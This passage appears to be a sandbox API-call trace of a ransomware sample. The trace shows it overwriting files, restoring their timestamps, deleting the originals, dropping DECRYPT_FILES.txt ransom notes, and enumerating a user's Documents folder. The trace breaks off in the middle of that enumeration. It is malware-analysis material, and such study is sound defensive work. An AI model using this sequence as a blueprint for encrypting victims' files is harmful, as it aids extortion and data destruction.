lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.363] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.363] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.364] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.365] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.365] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5c8a8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8a8*=0x800, lpOverlapped=0x0) returned 1 [0071.365] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.366] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.367] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.367] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.368] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.369] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.370] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.370] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.371] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.372] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.373] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.373] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.374] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.375] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.375] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5c8a8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8a8*=0x800, lpOverlapped=0x0) returned 1 [0071.375] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.376] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.377] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.377] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.378] WriteFile (in: hFile=0x384, lpBuffer=0x232eb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x232eb00*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.379] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.379] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c918*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c918*=0) returned 0x0 [0071.379] SetEndOfFile (hFile=0x384) returned 1 [0071.381] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c918*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5c918*=0) returned 0x0 [0071.381] CloseHandle (hObject=0x384) returned 1 [0071.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c710) returned 1 [0071.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.381] GetFileType (hFile=0x384) returned 0x1 [0071.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c680) returned 1 [0071.381] GetFileType (hFile=0x384) returned 0x1 [0071.381] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5c978, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.381] CloseHandle (hObject=0x384) returned 1 [0071.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c710) returned 1 [0071.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.382] GetFileType (hFile=0x384) returned 0x1 [0071.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c680) returned 1 [0071.382] GetFileType (hFile=0x384) returned 0x1 [0071.382] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5c978, lpLastWriteTime=0x0) returned 1 [0071.382] CloseHandle (hObject=0x384) returned 1 [0071.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c710) returned 1 [0071.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.382] GetFileType (hFile=0x384) returned 0x1 [0071.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c680) returned 1 [0071.382] GetFileType (hFile=0x384) returned 0x1 [0071.382] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5c978) returned 1 [0071.382] CloseHandle (hObject=0x384) returned 1 [0071.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.382] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\r0xx_-uxkbnvtbm.png")) returned 1 [0071.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", nBufferLength=0x105, lpBuffer=0x1bf5c500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\r0xX_-uxKbNvTBm.png", lpFilePart=0x0) returned 0x52 [0071.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", nBufferLength=0x105, lpBuffer=0x1bf5c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", lpFilePart=0x0) returned 0x5f [0071.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7b0) returned 1 [0071.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\01f7d2e39af487164530ab9e3f77fc4c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.383] GetFileType (hFile=0x384) returned 0x1 [0071.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c720) returned 1 [0071.383] GetFileType (hFile=0x384) returned 0x1 [0071.383] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5ca18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.383] CloseHandle (hObject=0x384) returned 1 [0071.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", nBufferLength=0x105, lpBuffer=0x1bf5c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", lpFilePart=0x0) returned 0x5f [0071.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7b0) returned 1 [0071.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\01f7d2e39af487164530ab9e3f77fc4c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.384] GetFileType (hFile=0x384) returned 0x1 [0071.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c720) returned 1 [0071.384] GetFileType (hFile=0x384) returned 0x1 [0071.384] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5ca18, lpLastWriteTime=0x0) returned 1 [0071.384] CloseHandle (hObject=0x384) returned 1 [0071.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", nBufferLength=0x105, lpBuffer=0x1bf5c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C", lpFilePart=0x0) returned 0x5f [0071.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7b0) returned 1 [0071.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\01F7D2E39AF487164530AB9E3F77FC4C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\01f7d2e39af487164530ab9e3f77fc4c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.384] GetFileType (hFile=0x384) returned 0x1 [0071.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c720) returned 1 [0071.384] GetFileType (hFile=0x384) returned 0x1 [0071.384] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5ca18) returned 1 [0071.384] CloseHandle (hObject=0x384) returned 1 [0071.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5c410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x50 [0071.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c8f0) returned 1 [0071.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x384 [0071.385] GetFileType (hFile=0x384) returned 0x1 [0071.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c860) returned 1 [0071.385] GetFileType (hFile=0x384) returned 0x1 [0071.385] WriteFile (in: hFile=0x384, lpBuffer=0x23327f8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5c938, lpOverlapped=0x0 | out: lpBuffer=0x23327f8*, lpNumberOfBytesWritten=0x1bf5c938*=0x9d5, lpOverlapped=0x0) returned 1 [0071.386] CloseHandle (hObject=0x384) returned 1 [0071.386] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x47 [0071.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1f0) returned 1 [0071.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x384 [0071.387] GetFileType (hFile=0x384) returned 0x1 [0071.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d160) returned 1 [0071.387] GetFileType (hFile=0x384) returned 0x1 [0071.387] WriteFile (in: hFile=0x384, lpBuffer=0x2334f70*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5d238, lpOverlapped=0x0 | out: lpBuffer=0x2334f70*, lpNumberOfBytesWritten=0x1bf5d238*=0x9d5, lpOverlapped=0x0) returned 1 [0071.388] CloseHandle (hObject=0x384) returned 1 [0071.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x37 [0071.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5daf0) returned 1 [0071.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0071.451] GetFileType (hFile=0x36c) returned 0x1 [0071.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da60) returned 1 [0071.451] GetFileType (hFile=0x36c) returned 0x1 [0071.451] WriteFile (in: hFile=0x36c, lpBuffer=0x233b370*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5db38, lpOverlapped=0x0 | out: lpBuffer=0x233b370*, lpNumberOfBytesWritten=0x1bf5db38*=0x9d5, lpOverlapped=0x0) returned 1 [0071.452] CloseHandle (hObject=0x36c) returned 1 [0071.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0071.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0071.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x0) returned 0x28 [0071.452] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1538b20, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1538b20, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.453] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1538b20, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1538b20, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.453] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bbabd0, ftCreationTime.dwHighDateTime=0x1d4c7ec, ftLastAccessTime.dwLowDateTime=0x16fb65e0, ftLastAccessTime.dwHighDateTime=0x1d4cd27, ftLastWriteTime.dwLowDateTime=0x16fb65e0, ftLastWriteTime.dwHighDateTime=0x1d4cd27, nFileSizeHigh=0x0, nFileSizeLow=0xa25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="1G4JK.docx", cAlternateFileName="1G4JK~1.DOC")) returned 1 [0071.453] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc725fa70, ftCreationTime.dwHighDateTime=0x1d4cd36, ftLastAccessTime.dwLowDateTime=0xfa110c80, ftLastAccessTime.dwHighDateTime=0x1d4cce7, ftLastWriteTime.dwLowDateTime=0xfa110c80, ftLastWriteTime.dwHighDateTime=0x1d4cce7, nFileSizeHigh=0x0, nFileSizeLow=0x1609b, dwReserved0=0x0, dwReserved1=0x0, cFileName="29WT9iWgmUF.pps", cAlternateFileName="29WT9I~1.PPS")) returned 1 [0071.453] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0d6460, ftCreationTime.dwHighDateTime=0x1d4b58a, ftLastAccessTime.dwLowDateTime=0x5cbdce10, ftLastAccessTime.dwHighDateTime=0x1d50f9e, ftLastWriteTime.dwLowDateTime=0x5cbdce10, ftLastWriteTime.dwHighDateTime=0x1d50f9e, nFileSizeHigh=0x0, nFileSizeLow=0x1410e, dwReserved0=0x0, dwReserved1=0x0, cFileName="4rRbNGpZmiXP3k.pptx", cAlternateFileName="4RRBNG~1.PPT")) returned 1 [0071.453] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef35eb30, ftCreationTime.dwHighDateTime=0x1d4f47b, ftLastAccessTime.dwLowDateTime=0x476d070, ftLastAccessTime.dwHighDateTime=0x1d4e8e4, ftLastWriteTime.dwLowDateTime=0x476d070, ftLastWriteTime.dwHighDateTime=0x1d4e8e4, nFileSizeHigh=0x0, nFileSizeLow=0x18b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="CWUnR5CcUQWnX-ag1L3.docx", cAlternateFileName="CWUNR5~1.DOC")) returned 1 [0071.453] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86176c90, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0x83baa290, ftLastAccessTime.dwHighDateTime=0x1d51b83, ftLastWriteTime.dwLowDateTime=0x83baa290, ftLastWriteTime.dwHighDateTime=0x1d51b83, nFileSizeHigh=0x0, nFileSizeLow=0x17090, dwReserved0=0x0, dwReserved1=0x0, cFileName="cyBKL1Jd2-UCW0JGB.pptx", cAlternateFileName="CYBKL1~1.PPT")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, 